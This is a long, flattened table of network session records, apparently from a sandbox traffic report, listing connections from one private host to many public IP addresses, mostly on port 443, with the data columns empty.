                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25268192.168.2.2350978223.70.77.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25269192.168.2.235156864.108.191.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25270192.168.2.2358086139.50.63.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25271192.168.2.2356032108.55.92.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25272192.168.2.234949884.216.97.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25273192.168.2.233982683.159.111.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25274192.168.2.2354746185.245.67.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25275192.168.2.2356282103.103.2.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25276192.168.2.236032268.138.85.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25277192.168.2.2337860103.85.199.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25278192.168.2.2357374130.210.11.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25279192.168.2.2337522165.211.230.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25280192.168.2.2345794197.221.191.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25281192.168.2.233869472.108.130.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25282192.168.2.2343484185.231.129.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25283192.168.2.2347190210.208.199.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25284192.168.2.235932453.199.253.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25285192.168.2.2351156166.123.32.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25286192.168.2.2348112158.186.18.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25287192.168.2.2333530201.45.213.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25288192.168.2.234547889.15.104.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25289192.168.2.2336868187.212.61.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25290192.168.2.2346714128.220.102.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25291192.168.2.2339796208.197.255.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25292192.168.2.233643613.45.160.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25293192.168.2.233497445.118.72.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25294192.168.2.235977863.39.191.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25295192.168.2.236099497.71.49.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25296192.168.2.2332952177.106.5.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25297192.168.2.235652886.249.108.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25298192.168.2.234883835.155.204.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25299192.168.2.234184640.245.26.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25300192.168.2.235486681.125.76.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25301192.168.2.2352672104.2.43.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25302192.168.2.2337242125.113.188.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25303192.168.2.233284691.112.143.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25304192.168.2.2348396154.196.87.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25305192.168.2.234947045.99.226.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25306192.168.2.2343142184.201.174.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25307192.168.2.2337130201.200.207.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25308192.168.2.234730824.148.25.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25309192.168.2.2335386203.73.85.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25310192.168.2.2345620218.55.181.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25311192.168.2.236036619.18.65.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25312192.168.2.2355372180.109.245.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25313192.168.2.2336356210.243.27.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25314192.168.2.2336530189.155.124.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25315192.168.2.2353110189.133.170.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25316192.168.2.2347770180.215.212.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25317192.168.2.2356758147.153.12.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25318192.168.2.2360592197.20.48.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25319192.168.2.234515237.70.112.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25320192.168.2.2344820137.42.241.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25321192.168.2.235156660.173.83.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25322192.168.2.2333932148.205.201.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25323192.168.2.233348814.126.218.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25324192.168.2.234267275.249.73.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25325192.168.2.235879037.19.140.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25326192.168.2.234360685.238.145.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25327192.168.2.2345648122.81.112.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25328192.168.2.235038245.105.56.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25329192.168.2.2341292223.36.69.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25330192.168.2.235789420.244.78.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25331192.168.2.2353270203.54.151.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25332192.168.2.2342780193.172.169.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25333192.168.2.234924225.207.58.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25334192.168.2.2335822126.4.57.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25335192.168.2.235091486.130.16.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25336192.168.2.236091275.205.104.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25337192.168.2.2357854203.159.53.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25338192.168.2.2353636128.168.159.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25339192.168.2.2341384139.203.1.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25340192.168.2.2357606137.98.70.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25341192.168.2.234543888.37.132.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25342192.168.2.235721694.154.210.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25343192.168.2.2360114196.14.65.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25344192.168.2.2347084204.149.154.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25345192.168.2.2333444120.214.229.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25346192.168.2.2337780167.205.73.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25347192.168.2.2355996205.184.127.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25348192.168.2.2360386171.219.169.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25349192.168.2.234687831.159.127.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25350192.168.2.235703073.188.111.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25351192.168.2.235929267.70.24.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25352192.168.2.235156496.73.226.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25353192.168.2.2342388113.163.120.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25354192.168.2.234817648.216.48.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25355192.168.2.235187213.5.95.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25356192.168.2.2334994203.119.192.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25357192.168.2.235674686.249.7.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25358192.168.2.235521482.5.17.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25359192.168.2.235424841.183.198.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25360192.168.2.2351972161.151.132.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25361192.168.2.2350814142.234.7.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25362192.168.2.2348016209.49.142.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25363192.168.2.234067498.112.73.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25364192.168.2.2357700166.35.193.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25365192.168.2.234592269.163.101.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25366192.168.2.2333018163.185.51.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25367192.168.2.235943420.60.7.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25368192.168.2.234184619.173.191.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25369192.168.2.2352458194.86.50.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25370192.168.2.235329819.29.11.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25371192.168.2.2354818205.138.29.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25372192.168.2.2355360206.49.217.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25373192.168.2.2357652162.225.255.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25374192.168.2.235723676.223.12.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25375192.168.2.2353904172.39.144.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25376192.168.2.235344050.187.102.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25377192.168.2.2341904174.185.203.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25378192.168.2.233802464.157.120.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25379192.168.2.234247425.214.201.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25380192.168.2.2343710203.54.226.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25381192.168.2.2335356218.160.24.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25382192.168.2.233712842.154.157.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25383192.168.2.2349286220.10.113.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25384192.168.2.235724880.138.50.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25385192.168.2.233484044.13.113.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25386192.168.2.2338474110.0.26.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25387192.168.2.2345052157.230.110.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25388192.168.2.233335494.14.106.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25389192.168.2.2335334166.241.17.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25390192.168.2.234924057.144.115.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25391192.168.2.234693076.209.0.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25392192.168.2.2353176172.108.129.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25393192.168.2.2352152181.183.67.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25394192.168.2.2337840209.47.125.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25395192.168.2.235129444.150.174.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25396192.168.2.234050478.52.56.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25397192.168.2.235449248.243.208.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25398192.168.2.234639287.100.215.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25399192.168.2.235961653.161.58.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25400192.168.2.2349000176.137.174.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25401192.168.2.2338262114.243.146.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25402192.168.2.235753078.148.249.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25403192.168.2.2358388150.184.116.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25404192.168.2.2354204212.114.241.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25405192.168.2.2343304153.74.15.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25406192.168.2.2356666178.147.86.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25407192.168.2.235646886.147.5.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25408192.168.2.2340346165.1.204.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25409192.168.2.2340214153.164.159.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25410192.168.2.23407842.245.91.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25411192.168.2.234620844.147.218.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25412192.168.2.235578840.167.54.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25413192.168.2.234904273.146.224.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25414192.168.2.235991038.219.248.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25415192.168.2.234524876.136.230.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25416192.168.2.2339394218.55.186.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25417192.168.2.2336936108.211.31.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25418192.168.2.233807068.4.237.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25419192.168.2.2359460105.172.206.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25420192.168.2.2345964153.112.164.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25421192.168.2.2341876139.251.250.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25422192.168.2.2347222181.64.238.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25423192.168.2.2341700209.219.125.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25424192.168.2.233324487.115.253.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25425192.168.2.2359286117.37.245.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25426192.168.2.2349380103.86.72.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25427192.168.2.235439038.203.237.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25428192.168.2.235549277.194.233.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25429192.168.2.2346752188.232.151.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25430192.168.2.2353564195.64.50.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25431192.168.2.235061695.134.6.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25432192.168.2.2346722110.39.164.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25433192.168.2.2345126193.248.42.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25434192.168.2.2340002180.52.220.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25435192.168.2.2352086189.248.74.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25436192.168.2.234928491.241.107.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25437192.168.2.2349530204.198.70.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25438192.168.2.235286082.255.81.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25439192.168.2.23360082.157.245.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25440192.168.2.2351704125.22.101.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25441192.168.2.2351386123.14.99.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25442192.168.2.235634425.204.198.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25443192.168.2.2334384171.9.20.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25444192.168.2.233934688.101.114.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25445192.168.2.2349858150.44.111.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25446192.168.2.235641287.244.219.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25447192.168.2.235458871.202.102.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25448192.168.2.2337676208.62.184.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25449192.168.2.234508644.208.74.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25450192.168.2.234766017.79.161.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25451192.168.2.233886045.178.169.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25452192.168.2.235380870.128.215.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25453192.168.2.233836495.78.151.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25454192.168.2.234697288.65.35.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25455192.168.2.234447237.240.3.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25456192.168.2.236043682.99.168.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25457192.168.2.2354094123.72.67.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25458192.168.2.2335164161.187.49.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25459192.168.2.2342722219.79.61.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25460192.168.2.233401838.23.203.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25461192.168.2.2349010139.108.3.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25462192.168.2.233439839.199.139.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25463192.168.2.235310083.199.250.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25464192.168.2.2339106174.168.232.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25465192.168.2.2340734111.25.8.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25466192.168.2.2337346169.148.14.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25467192.168.2.2347992121.88.151.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25468192.168.2.2351990156.67.181.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25469192.168.2.235970286.69.7.16337215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25470192.168.2.2355556195.251.235.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25471192.168.2.233773245.224.198.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25472192.168.2.2333090158.17.196.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25473192.168.2.236086079.255.87.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25474192.168.2.233656260.192.62.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25475192.168.2.234915060.177.194.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25476192.168.2.2334486157.66.70.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25477192.168.2.2349108179.25.55.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25478192.168.2.2350562133.163.12.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25479192.168.2.23501742.206.229.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25480192.168.2.2347200141.105.41.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25481192.168.2.234404237.46.60.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25482192.168.2.2360192105.215.28.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25483192.168.2.23328209.43.9.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25484192.168.2.2346046134.14.240.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25485192.168.2.234274643.121.253.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25486192.168.2.2332786133.132.180.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25487192.168.2.2358270138.108.216.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25488192.168.2.2338588186.82.132.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25489192.168.2.2360724149.224.239.114443
